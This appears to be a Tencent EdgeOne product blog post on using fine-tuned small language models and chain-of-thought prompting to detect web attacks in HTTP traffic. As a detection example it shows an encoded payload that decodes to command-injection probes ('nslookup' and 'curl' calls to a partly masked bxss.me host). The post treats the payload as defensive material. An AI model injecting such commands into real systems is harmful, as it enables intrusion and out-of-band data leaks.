When Vulnerability Attacks Meet Tencent Hunyuan: The Cyber Duel of Web Security with EdgeOne

EdgeOne-Product Team
10 min read
Apr 27, 2025

The "Tencent Cloud 2024 DDoS and Application Security Threat Trends Report" indicates that the methods of attack leveraging vulnerabilities and application weaknesses are becoming increasingly diverse and complex. In 2024, the total number of high-risk vulnerability attacks is expected to exceed 1.7 billion. Faced with this severe challenge, how should we respond? In this article, we will discuss our latest endeavor—leveraging large model capabilities for vulnerability identification. You can experience EdgeOne's vulnerability detection capabilities firsthand through the Managed Rules - Deep Analysis feature.

New Cybersecurity Threats: The Dual Challenge of Vulnerability Attacks

Currently, cybersecurity faces unprecedented challenges, particularly in the context of frequent vulnerability attacks. Imagine a scenario during a major e-commerce promotion where hackers stealthily steal user data using clever SQL statements or disguise malicious scripts as legitimate requests, launching attacks amidst a sea of legitimate traffic. This poses a constant risk of data breaches and business interruptions for enterprises.

To counter these threats, EdgeOne's Web Traffic Attack Detection System effectively filters and intercepts malicious vulnerability attack traffic, mitigating the risks of intrusion and data leakage. However, as attack methods continue to evolve, traditional defense systems face the dual dilemma of false negatives and false positives:

 Expert Rules can quickly identify known attacks but are powerless against novel threats.

 Semantic Analysis offers high accuracy but is slower when processing massive volumes of requests.

 Traditional Machine Learning has adaptive capabilities but is limited in practical applications due to its reliance on data.

Detection Solution

Description

Advantages

Disadvantages

Expert Rules

Based on predefined rules by security experts (e.g., regex, feature strings) to match attack patterns

Low development cost, fast rule matching, quick output for known attacks

High maintenance cost: requires continuous manual updates, lagging behind new attacks; prone to false negatives and positives.

Semantic Analysis

Analyzes the semantic structure of inputs (e.g., SQL syntax trees, JavaScript execution intentions) to determine if they conform to legitimate behavior

High detection accuracy, strong interpretability, can address some zero-day attacks

Complex implementation: requires deep understanding of target language syntax and execution environment, high development costs; significant performance overhead; limited scenarios: mainly targets attacks with strong language characteristics (e.g., SQL injection, XSS), poor generalizability.

Traditional Machine Learning

Trains models (e.g., random forests, HMM, clustering algorithms) to analyze traffic features, behavior patterns, or text structures to distinguish normal traffic from attack traffic

Strong adaptability (reduces reliance on manual rules), can address some zero-day attacks

Data dependency: requires a large amount of labeled data, data quality directly impacts effectiveness; poor interpretability: model decision processes are opaque, making debugging false positives difficult.

In this context, improving detection accuracy has become our focal point. The emergence of large models offers a new solution to this problem.

Application of Large Models in Traffic Analysis: From Basic Knowledge to Deep Analysis

Large models learn foundational security knowledge, code logic in HTTP traffic, protocol behaviors, and attack patterns through pre-training, constructing multi-layered knowledge associations to genuinely understand traffic behavior and enhance detection accuracy. For instance, when parsing SQL injections, the model not only identifies keywords like SELECT FROM or UNION SELECT but also assesses whether they constitute closed queries and whether they disrupt business logic.

The following two examples illustrate the large model's capability for deep analysis and understanding of traffic content, achieving a leap from "syntactic compliance" to "intent harm assessment."

Scenario 1: The Debate of the True and False Monkey King—Identifying Normal SQL Queries to Avoid False Positives from Traditional Static Rules.

Traditional Detection: Triggers an alert upon seeing SQL keywords.

LLM Detective Perspective:

Checks request context: understands the semantics as a legitimate business query interface.

Behavior pattern analysis: no special characters indicating injection.

Conclusion: This is a normal product query from the business backend!

The Debate of the True and False Monkey King—Identifying Normal SQL Queries to Avoid False Positives from Traditional Static Rules.

Scenario 2: The Secret of the Password Book—Automatically Decrypting Encrypted Content and Conducting Intent Analysis to Accurately Identify Attacks.

Encrypted Traffic:

keyword=fChuc2xvb2t1cCR7SUZTfS1xJHtJRIN9Y25hbWUke0IGU31oaXRnaXFtZnZnc3drZDc4NjQu...

LLM Detective Investigation Process:

Detects encrypted content, decodes to reveal command combinations.

nslookup cname ***********.bxss.me

curl ***********.bxss.me

Key Insight: Domain resolution points to a malicious IP, curl command sends a request.

Conclusion: This is a malicious attack!

The Secret of the Password Book—Automatically Decrypting Encrypted Content and Conducting Intent Analysis to Accurately Identify Attacks.

Large Model Optimization and Multi-Model Collaboration: Enhancing the Efficiency and Accuracy of Network Attack Detection

How can we apply large models in EdgeOne? Next, we will discuss the challenges and solutions we encountered during practical implementation.

Chain of Thought (CoT) Training Method: Enhancing Attack Recognition Capabilities through Prompt Tuning

Given that HTTP traffic attack content may appear in various fields and undergo encoding and encryption to conceal attacks, simple prompt instructions may lead to insufficient analysis by the model, resulting in missed detections.

During the prompt tuning process, we draw on the CoT thinking chain approach, providing an analysis process to determine whether a request is a web attack based on the characteristics of real-world attack traffic. This guides the large model to analyze step-by-step, ultimately confirming the result, akin to Sherlock Holmes deducing the final truth through case details!

Scenario Case: Identifying an attack behavior where the attacker attempts to probe whether the source station has a source code compressed package.

Large Model Slimming Plan: Fine-Tuning Small Parameter Models to Enhance Detection Efficiency

As EdgeOne's customer traffic scales dramatically, large parameter models face challenges due to high computational complexity and inference latency, making it difficult to meet efficient detection needs. Through domain knowledge distillation, we can transfer the capabilities of large models to small parameter models.

Small parameter models require lower resource costs and offer faster processing performance. However, comparative evaluations show that small parameter models are less effective in detecting attack samples and accurately identifying benign samples than large parameter models. By distilling the attack determination data from large parameter models and fine-tuning small parameter models, we achieve performance close to that of large parameter models in sample set evaluations.

 Data: 7,000 entries (including various attack type samples and benign samples).

 Base Models: hunyuan-3b\qwen2.5-3b\llama3.2-3b

 Fine-Tuning Method: lora

LLM Detective Alliance: Multi-Model Joint Voting

We simultaneously fine-tuned multiple base small models, including hunyuan-3b, qwen2.5-3b, and llama3.2-3b. Each model has its strengths and weaknesses in terms of attack detection rates and benign sample recognition rates in the test sample set. By analyzing the differences in sample performance, the Tencent Hunyuan model outperformed in three out of five attack type scenarios, while two could complement other models. We further designed a joint voting detection scheme involving three small models to enhance overall detection accuracy.

Detection Logic: If more than two models classify it as an attack, it is deemed an attack; if more than two models classify it as normal, it is deemed normal.

Evaluation Results on Sample Sets: Through multi-model collaboration, the overall attack detection accuracy improved compared to single models, achieving performance close to that of large parameter models.

Third-Party Tool Evaluation (BlazeHTTP): BlazeHTTP (https://github.com/chaitin/blazehttp) is a well-known public third-party evaluation tool for web traffic attack detection, with a total of over 33,000 samples covering various attacks and benign samples. EdgeOne's strict mode for vulnerability protection achieved an accuracy rate exceeding 99%, with a false positive rate of only 0.4%.

Future Outlook for Cybersecurity: From Defense to Intelligent Governance

Digital Sandbox

Constructing a digital mirror outside the real environment, where AI can:

Safely test new rules.

Simulate attack drills.

Validate model reliability.

In the observation mode of EdgeOne's vulnerability protection, requests hitting rules for domains undergo offline large model determinations, automatically filtering out unsuitable strategies for the business, achieving adaptive effects—like having an ever-vigilant special security force!

0Day Hunting Program

Combining RAG technology, we can correlate threat intelligence with vulnerability databases in real-time to identify zero-day attacks through traffic feature recognition.

Traffic Features → Semantic Parsing → Threat Knowledge Graph → Global Attack Sample Library → Automatically Generate Protection Strategies.

When large models meet cybersecurity, we not only create smarter detection tools but also redefine the boundaries of defense. This ongoing arms race is witnessing how AI transforms from a bystander to a guardian. Behind your secure web browsing, there may be an invisible AI detective safeguarding your safety!

Currently, the standard version of EdgeOne offers a coupon for a discount of 318 on purchases over 590 (click the link for more event information: Best Affordable Secure CDN: Tencent EdgeOne - Free Trial). You can experience EdgeOne's vulnerability detection capabilities firsthand through the Managed Rules - Deep Analysis feature. The large model-based vulnerability identification capability is under intensive planning and development, promising revolutionary changes in the field of vulnerability detection. Stay tuned for more updates! For more information, please refer to the product documentation: Managed rules

Tencent Cloud 2024 DDoS and Application Security Threat Trends Report: 2024 DDoS and Application Security Threat Trend Report - Tencent EdgeOne